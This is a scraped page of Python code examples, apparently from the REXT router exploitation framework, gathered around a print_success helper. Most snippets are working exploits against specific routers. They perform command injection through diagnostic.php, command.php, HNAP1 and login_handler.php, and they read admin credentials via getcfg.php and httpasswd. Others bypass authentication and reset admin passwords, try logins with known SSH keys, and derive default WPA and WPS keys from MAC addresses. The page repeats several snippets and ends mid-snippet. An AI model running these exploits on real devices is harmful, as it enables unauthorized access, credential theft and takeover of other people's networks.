Esempio n. 1
0
    def get_host_info(self, host_info, index):

        if host_info is not None:
            # If this host data is already complete, just display it
            if host_info['dataComplete']:
                print_warning('Data for this host has already been enumerated!')
                return
            try:
                # Get extended device and service information
                if host_info:
                    print_info("Requesting device and service info for " +
                               host_info['name'] + " (this could take a few seconds)...")
                    if not host_info['dataComplete']:
                        (xml_headers, xml_data) = self.get_xml(host_info['xml_file'])
                        # print(xmlHeaders)
                        # print(xmlData)
                        if not xml_data:
                            print_error('Failed to request host XML file:' + host_info['xml_file'])
                            return
                        if not self.get_host_information(xml_data, xml_headers, index):
                            print_error("Failed to get device/service info for " + host_info['name'])
                            return
                    print_success('Host data enumeration complete!')
                    # hp.updateCmdCompleter(hp.ENUM_HOSTS)
                    return
            except KeyboardInterrupt:
                return
Esempio n. 2
0
    def do_run(self, e):
        url = "http://%s:%s/diagnostic.php" % (self.host, self.port)

        payload = {'act': 'ping', 'dst': '& %s&' % self.command}
        headers = {
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
        }
        try:
            print_warning("Sending exploit")
            response = requests.post(url,
                                     headers=headers,
                                     data=payload,
                                     timeout=60)
            if "<report>OK</report>" in response.text:
                print_success("output not available this is blind injection")
            else:
                print_error(
                    "could not find marker in response, exploit failed")
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed")
Esempio n. 3
0
 def do_run(self, e):
     user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
     headers = {'User-Agent': user_agent,
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
                'Connection': 'keep-alive',
                'Accept-Encoding': 'gzip, deflate',
                'Cache-Control': 'no-cache',
                'Cookie': 'C107373883=/omg1337hax'}
     target = 'http://' + self.host + ":" + self.port + '/blabla'
     try:
         response = requests.get(target, headers=headers, timeout=60)
         if response.status_code != 404:
             print_failed("Unexpected HTTP status, expecting 404 got: %d" % response.status_code)
             print_red("Device is not running RomPager")
         else:
             if 'server' in response.headers:
                 server = response.headers.get('server')
                 if re.search('RomPager', server) is not None:
                     print_green("Got RomPager! Server:%s" % server)
                     if re.search('omg1337hax', response.text) is not None:
                         print_success("device is vulnerable to misfortune cookie")
                     else:
                         print_failed("test didn't pass.")
                         print_warning("Device MAY still be vulnerable")
                 else:
                     print_failed("RomPager not detected, device is running: %s " % server)
             else:
                 print_failed("Not running RomPager")
     except requests.exceptions.Timeout:
         print_error("Timeout!")
     except requests.exceptions.ConnectionError:
         print_error("No route to host")
Esempio n. 4
0
    def do_run(self, e):
        url = "http://%s:%s/getcfg.php" % (self.host, self.port)

        payload = {'SERVICES': 'DEVICE.ACCOUNT'}
        headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                   'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
                   'Accept-Encoding': 'gzip, deflate',
                   'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
                   }
        try:
            print_warning("Sending exploit")
            response = requests.post(url, headers=headers, data=payload, timeout=60)
            if "<service>DEVICE.ACCOUNT</service>" in response.text:
                usernames = re.findall("<name>(.*)</name>", response.text)
                passwords = re.findall("<password>(.*)</password>", response.text)

                if "==OoXxGgYy==" in passwords:
                    print_error("Exploit failed, router responded with default value ==OoXxGgYy==")
                else:
                    print_success("")
                    for i in range(len(usernames)):
                        print("Username: "******"Password: "******"Exploit failed")
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed")
Esempio n. 5
0
    def do_run(self, e):
        url = "http://%s:%s/debug.cgi" % (self.host, self.port)
        data = {"data1": "echo 741852", "command": "ui_debug"}

        try:
            response = requests.post(url=url,
                                     data=data,
                                     auth=("Gemtek", "gemtekswd"),
                                     timeout=60)
            result = re.findall(
                "<textarea rows=30 cols=100>\\n(.*)\\n</textarea>",
                response.text)
            if "741852" == result[0]:
                print_success("Target is vulnerable")
                data = {"data1": self.command, "command": "ui_debug"}
                response = requests.post(url=url,
                                         data=data,
                                         auth=("Gemtek", "gemtekswd"),
                                         timeout=60)
                result = re.findall(
                    "<textarea rows=30 cols=100>\\n(.*)\\n</textarea>",
                    response.text)
                print(result[0])
            else:
                print_error("target is not vulnerable")
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed")
        except TypeError:
            print_error("Something went wrong in answer parsing")
Esempio n. 6
0
 def auth_bypass(self):
     user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
     headers = {
         'User-Agent': user_agent,
         'Accept':
         'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
         'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
         'Connection': 'keep-alive',
         'Accept-Encoding': 'gzip, deflate',
         'Cache-Control': 'no-cache',
         'Cookie': 'C' + str(self.number) + '=' + 'B' * self.offset + '\x00'
     }
     target = 'http://' + self.host + ":" + self.port
     try:
         response = requests.get(target, headers=headers, timeout=60)
         if response is not None and response.status_code <= 302:
             print_success(
                 "Exploit sent, please check http://%s:%s authentication should be disabled"
                 % (self.host, self.port))
         else:
             print_error("Exploit failed")
     except requests.exceptions.Timeout:
         print_error("Timeout!")
     except requests.exceptions.ConnectionError:
         print_error("No route to host")
Esempio n. 7
0
 def do_run(self, e):
     #httplib2.debuglevel = 1
     user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
     headers = {'User-Agent': user_agent,
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
                'Connection': 'keep-alive',
                'Accept-Encoding': 'gzip, deflate',
                'Cache-Control': 'no-cache',
                'Cookie': 'C107373883=/omg1337hax'}
     target = 'http://' + self.host + ":" + self.port + '/blabla'
     h = httplib2.Http(timeout=60)
     h.follow_all_redirects = True
     try:
         response, content = h.request(target, 'GET', headers=headers)
         if response.status != 404:
             print_failed("Unexpected HTTP status, expecting 404 got: %d" % response.status)
             print_red("Device is not running RomPager")
         else:
             if 'server' in response.keys():
                 server = response.get('server')
                 if re.search('RomPager', server) is not None:
                     print_green("Got RomPager! Server:%s" % server)
                     if re.search('omg1337hax', content.decode()) is not None:
                         print_success("device is vulnerable to misfortune cookie")
                     else:
                         print_failed("test didn't pass.")
                         print_warning("Device MAY still be vulnerable")
                 else:
                     print_failed("RomPager not detected, device is running: %s " % server)
             else:
                 print_failed("Not running RomPager")
     except socket.timeout:  # Is there a better way of handling timeout in httplib2?
         print_error("Timeout!")
Esempio n. 8
0
    def do_run(self, e):
        url = "http://%s:%s/command.php" % (self.host, self.port)

        payload = {'cmd': '%s; echo end' % self.command}
        headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                   'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
                   'Accept-Encoding': 'gzip, deflate',
                   'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
                   }
        try:
            print_yellow("Sending exploit")
            # Requests forces URI encoding and can't be turned off
            # so we have to prepare HTTP request manually and modify it with urllib.parse.quote before sending
            request = requests.Request('POST', url, headers=headers, data=payload)
            r = request.prepare()
            # print("Before modification:", r.body)
            r.body = urllib.parse.quote('cmd=%s; echo end' % self.command, safe='/=')
            r.headers.update({'Content-Length': len(r.body)})
            # print("After modification:", r.body)
            s = requests.Session()
            response = s.send(r, timeout=15)
            s.close()
            # This won't work
            # response = requests.post(url, headers=headers, data=payload, proxies=proxies, timeout=60)
            if "end" in response.text:  # end8758 is unique tag to search for in output
                print_success("output of %s:" % self.command)
                print_green(response.text)
            else:
                print_error("could not find marker in response, exploit failed")
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed or you killed httpd")
Esempio n. 9
0
 def do_run(self, e):
     print_info("Testing known keys")
     client = paramiko.SSHClient()
     client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
     connection = core.loader.open_database("./databases/bad_keys.db")
     cursor = connection.cursor()
     cursor.execute("SELECT user, port, filename, type, private_key FROM keys;")
     entries = cursor.fetchall()
     for entry in entries:
         try:
             username = entry[0]
             port = entry[1]
             filename = entry[2]
             key_type = entry[3]
             string_key = entry[4]
             if key_type == 'RSA':
                 private_key = paramiko.RSAKey.from_private_key(io.StringIO(string_key))
             elif key_type == 'DSA':
                 private_key = paramiko.DSSKey.from_private_key(io.StringIO(string_key))
             else:
                 print_error("Failed to load key of type:", key_type)
                 continue
             client.connect(self.host, port=port,  username=username, pkey=private_key, look_for_keys=False,
                            timeout=10)
             core.io.writetextfile(string_key, filename+".key")
             print_success("Username:"******"port:", port)
             print_info("Private key writen to:", filename+".key")
             client.close()
         except paramiko.AuthenticationException:
             pass
         except:
             pass
Esempio n. 10
0
 def do_run(self, e):
     url = "http://%s:%s/login_handler.php" % (self.host, self.port)
     headers = {
         'Accept':
         'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
         'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
         'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
     }
     data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData"; echo "741852'
     try:
         response = requests.post(url=url,
                                  headers=headers,
                                  data=data,
                                  timeout=60)
         if "741852" in response.text:
             print_success("target is vulnerable")
             # Not so sure about quoting of commands that has arguments
             data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData"; %s' % self.command
             response = requests.post(url=url,
                                      headers=headers,
                                      data=data,
                                      timeout=60)
             print(response.text)
         elif "failure" in response.text:
             print_error("Exploit failed, target is probably patched")
             print(response.text)
     except requests.Timeout:
         print_error("exploit failed")
     except requests.ConnectionError:
         print_error("exploit failed")
Esempio n. 11
0
    def do_run(self, e):
        url = "http://%s:%s/HNAP1" % (self.host, self.port)

        headers = {
            "SOAPAction":
            '"http://purenetworks.com/HNAP1/GetDeviceSettings/`%s`"' %
            self.command
        }
        try:
            print_warning("Sending exploit")
            requests.post(url, headers=headers, timeout=60)
            print_warning(
                "HTTPd is still responding this is OK if you changed the payload"
            )
        except requests.ConnectionError:
            print_success("exploit sent.")
            answer = query_yes_no(
                "Do you wish to dump all system settings? (if telned was started)"
            )
            if answer is True:
                tn = telnetlib.Telnet(self.host, self.port)
                print_info("Sending command through telnet")
                tn.read_until(b'#', timeout=15)
                tn.write(b"xmldbc -d /var/config.xml; cat /var/config.xml\n")
                response = tn.read_until(b'#', timeout=15)
                tn.close()
                print_info("Writing response to config.xml")
                writetextfile(response.decode('ascii'), "config.xml")
                print_warning(
                    "Don't forget to restart httpd or reboot the device")
        except requests.Timeout:
            print_error("timeout")
Esempio n. 12
0
    def do_run(self, e):
        mac_str = re.sub(r'[^a-fA-F0-9]', '', self.mac)
        bytemac = bytearray.fromhex(mac_str)
        print_success("")
        print_green('based on rg_mac:\nSSID: PBS-%02X%02X%02X' % (bytemac[3], bytemac[4], bytemac[5]))
        print_green('WPA key: %s\n' % (self.gen_key(bytemac)))

        bytemac[5] -= 5
        print_green('based on BSSID:\nSSID: PBS-%02X%02X%02X' % (bytemac[3], bytemac[4], bytemac[5]))
        print_green('WPA key: %s\n' % (self.gen_key(bytemac)))
Esempio n. 13
0
    def do_run(self, e):
        mac_str = re.sub(r'[^a-fA-F0-9]', '', self.mac)
        bytemac = bytearray.fromhex(mac_str)
        print_success("")
        print_green('based on rg_mac:\nSSID: PBS-%02X%02X%02X' % (bytemac[3], bytemac[4], bytemac[5]))
        print_green('WPA key: %s\n' % (self.gen_key(bytemac)))

        bytemac[5] -= 5
        print_green('based on BSSID:\nSSID: PBS-%02X%02X%02X' % (bytemac[3], bytemac[4], bytemac[5]))
        print_green('WPA key: %s\n' % (self.gen_key(bytemac)))
Esempio n. 14
0
 def do_run(self, e):
     f = open(self.input_file, 'rb')
     data = f.read()
     f.close()
     result = self.decompress_firmware(data)
     if result is not None:
         dirpath = core.io.writefile(result, "fw.decomp")
         print_success("Decompressed firmware written to fw.decomp")
         self.decompress_fs_only(data, dirpath)
         print_success("FS decompressed")
Esempio n. 15
0
 def do_run(self, e):
     f = open(self.input_file, 'rb')
     data = f.read()
     f.close()
     result = self.decompress_firmware(data)
     if result is not None:
         dirpath = core.io.writefile(result, "fw.decomp")
         print_success("Decompressed firmware written to fw.decomp")
         self.decompress_fs_only(data, dirpath)
         print_success("FS decompressed")
Esempio n. 16
0
 def do_run(self, e):
     f = open(self.input_file, 'rb')
     data = f.read()
     f.close()
     g, outdata = self.de_cfg(data)
     if g != self.CFG_RAW:
         core.io.writefile(outdata, "config.out")
         print_success("config file written to config.out, extracting credentials...")
     creds = self.get_credentials(outdata)
     print_green("Login    :\t" + (creds[0] == b"" and b"admin" or creds[0]).decode())
     print_green("Password :\t" + (creds[1] == b"" and b"admin" or creds[1]).decode())
Esempio n. 17
0
 def decrypt_cfg(self, data):
     """Decrypt config, bruteforce if default key fails"""
     modelstr = "V" + format(unpack(">H", self.get_modelid(data))[0], "04X")
     print_info('Model is :\t' + modelstr)
     ckey = self.make_key(modelstr)
     rdata = self.decrypt(data[0x100:], ckey)
     # if the decrypted data does not look good, bruteforce
     if self.smart_guess(rdata) != self.CFG_LZO:
         rdata = self.brute_cfg(data[0x100:])
         print_success('Used key :\t[0x%02X]' % ckey)
     return data[:0x2D] + b'\x01' + data[0x2E:0x100] + rdata
Esempio n. 18
0
 def brute_cfg(self, data):
     """Check all possible keys until data looks like decrypted"""
     rdata = None
     key = 0
     for i in range(256):
         rdata = self.decrypt(data, i)
         if self.smart_guess(rdata) == self.CFG_LZO:
             key = i
             break
     print_success('Found key:\t[0x%02X]' % key)
     return rdata
Esempio n. 19
0
 def brute_cfg(self, data):
     """Check all possible keys until data looks like decrypted"""
     rdata = None
     key = 0
     for i in range(256):
         rdata = self.decrypt(data, i)
         if self.smart_guess(rdata) == self.CFG_LZO:
             key = i
             break
     print_success('Found key:\t[0x%02X]' % key)
     return rdata
Esempio n. 20
0
 def decrypt_cfg(self, data):
     """Decrypt config, bruteforce if default key fails"""
     modelstr = "V" + format(unpack(">H", self.get_modelid(data))[0], "04X")
     print_info('Model is :\t' + modelstr)
     ckey = self.make_key(modelstr)
     rdata = self.decrypt(data[0x100:], ckey)
     # if the decrypted data does not look good, bruteforce
     if self.smart_guess(rdata) != self.CFG_LZO:
         rdata = self.brute_cfg(data[0x100:])
         print_success('Used key :\t[0x%02X]' % ckey)
     return data[:0x2D] + b'\x01' + data[0x2E:0x100] + rdata
Esempio n. 21
0
    def do_run(self, e):
        url = "http://%s:%s/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0" % (
            self.host, self.port)

        try:
            print_yellow("Sending exploit")
            response = requests.get(url, timeout=60)
            if response.status_code == 200 and 'name="admin_password1"' in response.text:
                print_success("target seems vulnerable")
                print_green(
                    "You can visit any page by adding ?NO_NEED_AUTH=1&AUTH_GROUP=0 to URL"
                )
                print_yellow("Changing admin password")
                headers = {
                    'Accept':
                    'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                    'Accept-Language':
                    'Accept-Language: en-us,en;q=0.5',
                    'Accept-Encoding':
                    'gzip, deflate',
                    'Content-Type':
                    'application/x-www-form-urlencoded;charset=utf-8'
                }
                payload = {
                    'NO_NEED_AUTH': 1,
                    'AUTH_GROUP': 0,
                    'ACTION_POST': 1,
                    'apply': 'Save+Settings',
                    'admin_name': 'admin',
                    'admin_password1': '%s' % self.password,
                    'admin_password2': '%s' % self.password,
                    'grap_auth_enable_h': 0,
                    'rt_ipaddr': '0.0.0.0'
                }
                url = "http://%s:%s/tools_admin.php" % (self.host, self.port)
                response = requests.post(url=url,
                                         headers=headers,
                                         data=payload,
                                         timeout=60)
                if response.status_code == 200:
                    print_success(
                        "password seems to be changed try to login with: %s" %
                        self.password)
                else:
                    print_error("password change failed")

            else:
                print_error("exploit failed")
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed")
Esempio n. 22
0
    def do_run(self, e):
        mac = self.mac
        mac = mac.upper()
        mac = mac.replace("-", "")
        mac = mac.replace(":", "")


        fibnum = [0, 0, 0, 0, 0, 0]
        fibsum = 0
        seed = 16
        count = 1
        offset = 0
        counter = 0
        a = 0

        macs = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
        tmp = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]

        c = 0
        while c < 12:
            macs[a] = int(mac[c]+mac[c+1], 16)
            tmp[a] = int(mac[c] + mac[c+1], 16)
            a += 1
            c += 2

        for i in range(6):
            if tmp[i] > 30:
                while tmp[i] > 31:
                    tmp[i] -= 16
                    counter += 1

            if counter == 0:
                if tmp[i] < 3:
                    tmp[i] = tmp[0]+tmp[1]+tmp[2]+tmp[3]+tmp[4]+tmp[5]-tmp[i]
                    if tmp[i] > 0xff:
                        tmp[i] = tmp[i] and 0xff
                    tmp[i] = int(tmp[i] % 28) + 3

                fibnum[i] = self.fib_gen(tmp[i])

            else:
                fibnum[i] = self.fib_gen(tmp[i]) + self.fib_gen(counter)
            counter = 0

        for i in range(6):
            fibsum += (fibnum[i] * self.fib_gen(i+seed))+macs[i]

        fibsum %= 10000000
        checksum = self.compute_checksum(fibsum)
        fibsum = (fibsum * 10) + checksum
        print_success("")
        print_green("WPS PIN: " + str(fibsum))
Esempio n. 23
0
    def do_run(self, e):
        mac = self.mac
        mac = mac.upper()
        mac = mac.replace("-", "")
        mac = mac.replace(":", "")
        ssid = "Sitecom%s" % mac[6:].upper()
        wpa_4000 = self.generate_key(mac, "4000")
        wpa_4004 = self.generate_key(mac, "4004")

        print_success("WPA keys generated")
        print("SSID:" + ssid)
        print("WPA Key for model WLR-4000: " + wpa_4000)
        print("WPA Key for model WLR-4004: " + wpa_4004)
Esempio n. 24
0
    def do_run(self, e):
        mac = self.mac
        mac = mac.upper()
        mac = mac.replace("-", "")
        mac = mac.replace(":", "")
        ssid = "Sitecom%s" % mac[6:].upper()
        wpa_4000 = self.generate_key(mac, "4000")
        wpa_4004 = self.generate_key(mac, "4004")

        print_success("WPA keys generated")
        print("SSID:" + ssid)
        print("WPA Key for model WLR-4000: " + wpa_4000)
        print("WPA Key for model WLR-4004: " + wpa_4004)
Esempio n. 25
0
 def do_run(self, e):
     f = open(self.input_file, 'rb')
     data = f.read()
     f.close()
     g, outdata = self.de_cfg(data)
     if g != self.CFG_RAW:
         core.io.writefile(outdata, "config.out")
         print_success(
             "config file written to config.out, extracting credentials...")
     creds = self.get_credentials(outdata)
     print_green("Login    :\t" +
                 (creds[0] == b"" and b"admin" or creds[0]).decode())
     print_green("Password :\t" +
                 (creds[1] == b"" and b"admin" or creds[1]).decode())
Esempio n. 26
0
    def do_run(self, e):
        url = "http://%s:%s/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd" % (self.host, self.port)

        try:
            print_yellow("Sending exploit")
            response = requests.get(url, timeout=60)
            if response.status_code == 200 and "<center>" in response.text:
                print_success("credentials fetched")
                credentials = re.findall("<center>\n\t\t\t(.*)", response.text)
                print(credentials[0])
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed")
Esempio n. 27
0
    def do_run(self, e):
        url = "http://%s:%s/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd" % (self.host, self.port)

        try:
            print_yellow("Sending exploit")
            response = requests.get(url, timeout=60)
            if response.status_code == 200 and "<center>" in response.text:
                print_success("credentials fetched")
                credentials = re.findall("<center>\n\t\t\t(.*)", response.text)
                print_green(credentials[0])
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed")
Esempio n. 28
0
    def do_run(self, e):
        mac = self.mac
        mac = mac.upper()
        mac = mac.replace("-", "")
        mac = mac.replace(":", "")

        const = int('D0EC31', 16)
        inp = int(mac[6:], 16)
        result = (inp - const)//4
        ssid = "Discus--"+mac[6:]
        key = "YW0" + str(result)

        print_success("")
        print_green("Possible SSID: " + ssid)
        print_green("WPA Key: " + key)
Esempio n. 29
0
    def do_run(self, e):
        target = "http://" + self.host + ":" + self.port
        try:
            response = requests.get(target, timeout=60)
            if response.status_code == requests.codes.unauthorized:
                print_yellow("Password protection detected")
                for i in range(0, 3):
                    time.sleep(1)
                    requests.get(target+"/BRS_netgear_success.html", timeout=60)
                response = requests.get(target, timeout=60)
                if response.status_code == requests.codes.ok:
                    print_success("bypass successful. Now use your browser to have at look at the admin interface.")

        except requests.RequestException:
            print_error("timeout!")
Esempio n. 30
0
 def do_update(self, e):
     args = e.split(' ')
     if args[0] == "oui":
         print_info("Updating OUI DB. Database rebuild may take several minutes.")
         # print_blue("Do you wish to continue? (y/n)")
         # Add if here
         updater.update_oui()
         print_success("OUI database updated successfully.")
     elif args[0] == "force":
         print_info("Discarding local changes and updating REXT")
         updater.update_rext_force()
     elif args[0] == "":
         print_info("Updating REXT please wait...")
         updater.update_rext()
         print_success("Update successful")
Esempio n. 31
0
    def do_run(self, e):
        mac = self.mac
        mac = mac.upper()
        mac = mac.replace("-", "")
        mac = mac.replace(":", "")

        const = int('D0EC31', 16)
        inp = int(mac[6:], 16)
        result = (inp - const)//4
        ssid = "Discus--"+mac[6:]
        key = "YW0" + str(result)

        print_success("")
        print_green("Possible SSID: " + ssid)
        print_green("WPA Key: " + key)
Esempio n. 32
0
    def do_run(self, e):
        mac = self.mac
        mac = mac.replace(":", "")
        mac = mac.replace("-", "")

        c1 = str(int(mac[8:], 16))

        while len(c1) < 5:
            c1 = "0" + c1

        s6 = int(c1[0], 16)
        s7 = int(c1[1], 16)
        s8 = int(c1[2], 16)
        s9 = int(c1[3], 16)
        s10 = int(c1[4], 16)
        m7 = int(mac[6], 16)
        m8 = int(mac[7], 16)
        m9 = int(mac[8], 16)
        m10 = int(mac[9], 16)
        m11 = int(mac[10], 16)
        m12 = int(mac[11], 16)

        k1 = (s7 + s8 + m11 + m12) & 0x0F
        k2 = (m9 + m10 + s9 + s10) & 0x0F

        x1 = k1 ^ s10
        x2 = k1 ^ s9
        x3 = k1 ^ s8
        y1 = k2 ^ m10
        y2 = k2 ^ m11
        y3 = k2 ^ m12
        z1 = m11 ^ s10
        z2 = m12 ^ s9
        z3 = k1 ^ k2

        ssid = "EasyBox-" + format(m7, 'x') + format(m8, 'x') + format(m9, 'x') \
               + format(m10, 'x') + format(s6, 'x') + format(s10, 'x')

        wpakey = format(x1, 'x') + format(y1, 'x') + format(z1, 'x') + \
                 format(x2, 'x') + format(y2, 'x') + format(z2, 'x') + \
                 format(x3, 'x') + format(y3, 'x') + format(z3, 'x')

        print_success("WPA2 key generated")
        print("SSID:" + ssid)
        print("WPA2KEY:" + wpakey.upper())
Esempio n. 33
0
File: rom-0.py Progetto: j91321/rext
 def do_run(self, e):
     target = "http://" + self.host + ":" + self.port
     try:
         response = requests.get(target + "/rom-0", timeout=60)
         content_type = 'application/octet-stream'
         if response.status_code == requests.codes.ok and response.headers.get('Content-Type') == content_type:
             print_success("got rom-0 file, size:" + str(len(response.content)))
             core.io.writefile(response.content, "rom-0")
         else:
             print_error("failed")
         print_info("Checking if rpFWUpload.html is available")
         response = requests.get(target + "/rpFWUpload.html", timeout=60)
         if response.status_code == requests.codes.ok:
             print_success("rpFWUpload.html is accessible")
         else:
             print_failed("rpFWUpload.html is not accessible")
     except requests.RequestException:
         print_error("timeout!")
Esempio n. 34
0
    def do_run(self, e):
        url = "http://%s:%s/getpage.gch?pid=101&nextpage=manager_dev_config_t.gch" % (self.host, self.port)

        try:
            print_warning("Sending exploit")
            # It took me longer than necessary to find out how to use Content-Disposition properly
            # Always set stream=True otherwise you may not get the whole file
            response = requests.post(url, files={'config': ''}, timeout=60, stream=True)
            if response.status_code == 200:
                if response.headers.get('Content-Disposition'):
                    print_success("got file in response")
                    print_info("Writing file to config.bin")
                    core.io.writefile(response.content, "config.bin")
                    print_success("you can now use decryptors/zte/config_zlib_decompress to extract XML")
        except requests.ConnectionError as e:
            print_error("connection error %s" % e)
        except requests.Timeout:
            print_error("timeout")
Esempio n. 35
0
    def do_run(self, e):
        target = "http://" + self.host + ":" + self.port
        try:
            response = requests.get(target, timeout=60)
            if response.status_code == requests.codes.unauthorized:
                print_yellow("Password protection detected")
                for i in range(0, 3):
                    time.sleep(1)
                    requests.get(target + "/BRS_netgear_success.html",
                                 timeout=60)
                response = requests.get(target, timeout=60)
                if response.status_code == requests.codes.ok:
                    print_success(
                        "bypass successful. Now use your browser to have at look at the admin interface."
                    )

        except requests.RequestException:
            print_error("timeout!")
Esempio n. 36
0
 def do_run(self, e):
     f = open(self.input_file, 'rb')
     # These should be offsets of spt.dat but it somehow works with these values usually,
     # the core.compression.lzs is not a very good implementation, it won't decompress the whole file correctly
     # but it's enough to to extract admin password
     fpos = 8568
     fend = 8788
     f.seek(fpos)
     amount = 221
     while fpos < fend:
         if fend - fpos < amount:
             amount = amount
             data = f.read(amount)
             fpos += len(data)
     result, window = core.compression.lzs.LZSDecompress(data)
     print_info("Printing strings found in decompressed data (admin password is usually the first found):")
     for s in interface.utils.strings(result):
         print_success(s)
Esempio n. 37
0
    def do_run(self, e):
        url = "http://%s:%s/getpage.gch?pid=101&nextpage=manager_dev_config_t.gch" % (self.host, self.port)

        try:
            print_yellow("Sending exploit")
            # It took me longer than necessary to find out how to use Content-Disposition properly
            # Always set stream=True otherwise you may not get the whole file
            response = requests.post(url, files={'config': ''}, timeout=60, stream=True)
            if response.status_code == 200:
                if response.headers.get('Content-Disposition'):
                    print_success("got file in response")
                    print_yellow("Writing file to config.bin")
                    core.io.writefile(response.content, "config.bin")
                    print_success("you can now use decryptors/zte/config_zlib_decompress to extract XML")
        except requests.ConnectionError as e:
            print_error("connection error %s" % e)
        except requests.Timeout:
            print_error("timeout")
Esempio n. 38
0
    def do_run(self, e):
        target = "http://%s:%s/%s" % (self.host, self.port, self.file)
        try:
            # We have to manually craft the request if you use requests.get it sents HEAD first
            # and the exploit won't work
            request = requests.Request('GET', target)
            r = request.prepare()
            s = requests.Session()
            response = s.send(r, timeout=30)
            s.close()

            if response.status_code == 200:
                print_success("writing to file%s" % self.file)
                core.io.writetextfile(response.text, self.file)
            else:
                print_error("exploit probably failed got response code %s" % response.status_code)

        except requests.RequestException:
            print_error("timeout!")
Esempio n. 39
0
    def do_run(self, e):
        url = "http://%s:%s/hidden_info.html" % (self.host, self.port)

        try:
            print_warning("Sending exploit")
            response = requests.get(url, timeout=60)
            if "Manufacture Information" in response.text:
                print_success("information obtained, writing response into hidden_info.html")
                core.io.writetextfile(response.text, "hidden_info.html")
                print_warning("Please check file, response seems to depend on FW version, parsing may not be accurate")
                value = re.findall("str =\(\"\[\{(.*)\}", response.text)
                value = value[0].split(',')
                for i in value:
                    print_green(i)
            else:
                print_error("exploit failed")
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed")
Esempio n. 40
0
    def do_run(self, e):
        target = "http://%s:%s/%s" % (self.host, self.port, self.file)
        try:
            # We have to manually craft the request if you use requests.get it sents HEAD first
            # and the exploit won't work
            request = requests.Request('GET', target)
            r = request.prepare()
            s = requests.Session()
            response = s.send(r, timeout=30)
            s.close()

            if response.status_code == 200:
                print_success("writing to file%s" % self.file)
                core.io.writetextfile(response.text, self.file)
            else:
                print_error("exploit probably failed got response code %s" %
                            response.status_code)

        except requests.RequestException:
            print_error("timeout!")
Esempio n. 41
0
    def do_run(self, e):
        mac = self.mac
        mac = mac.upper()
        mac = mac.replace("-", "")
        mac = mac.replace(":", "")
        mac = mac[6:]

        p = int(mac, 16) % 10000000
        pin = p
        accum = 0
        while pin:
            accum += int(3 * (pin % 10))
            pin = int(pin / 10)
            accum += int(pin % 10)
            pin = int(pin / 10)
        key = (10 - accum % 10) % 10
        key = format("%07d%d" % (p, key))

        print_success("")
        print_green("WPS pin:" + key)
Esempio n. 42
0
 def do_run(self, e):
     target = "http://" + self.host + ":" + self.port
     try:
         response = requests.get(target + "/rom-0", timeout=60)
         content_type = 'application/octet-stream'
         if response.status_code == requests.codes.ok and response.headers.get(
                 'Content-Type') == content_type:
             print_success("got rom-0 file, size:" +
                           str(len(response.content)))
             core.io.writefile(response.content, "rom-0")
         else:
             print_error("failed")
         print("Checking if rpFWUpload.html is available")
         response = requests.get(target + "/rpFWUpload.html", timeout=60)
         if response.status_code == requests.codes.ok:
             print_success("rpFWUpload.html is accessible")
         else:
             print_failed("rpFWUpload.html is not accessible")
     except requests.RequestException:
         print_error("timeout!")
Esempio n. 43
0
    def do_run(self, e):
        mac = self.mac
        mac = mac.upper()
        mac = mac.replace("-", "")
        mac = mac.replace(":", "")
        mac = mac[6:]

        p = int(mac, 16) % 10000000
        pin = p
        accum = 0
        while pin:
            accum += int(3 * (pin % 10))
            pin = int(pin / 10)
            accum += int(pin % 10)
            pin = int(pin / 10)
        key = (10 - accum % 10) % 10
        key = format("%07d%d" % (p, key))

        print_success("")
        print_green("WPS pin:" + key)
Esempio n. 44
0
    def do_run(self, e):
        url = "http://%s:%s/diagnostic.php" % (self.host, self.port)

        payload = {'act': 'ping',
                   'dst': '& %s&' % self.command}
        headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                   'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
                   'Accept-Encoding': 'gzip, deflate',
                   'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
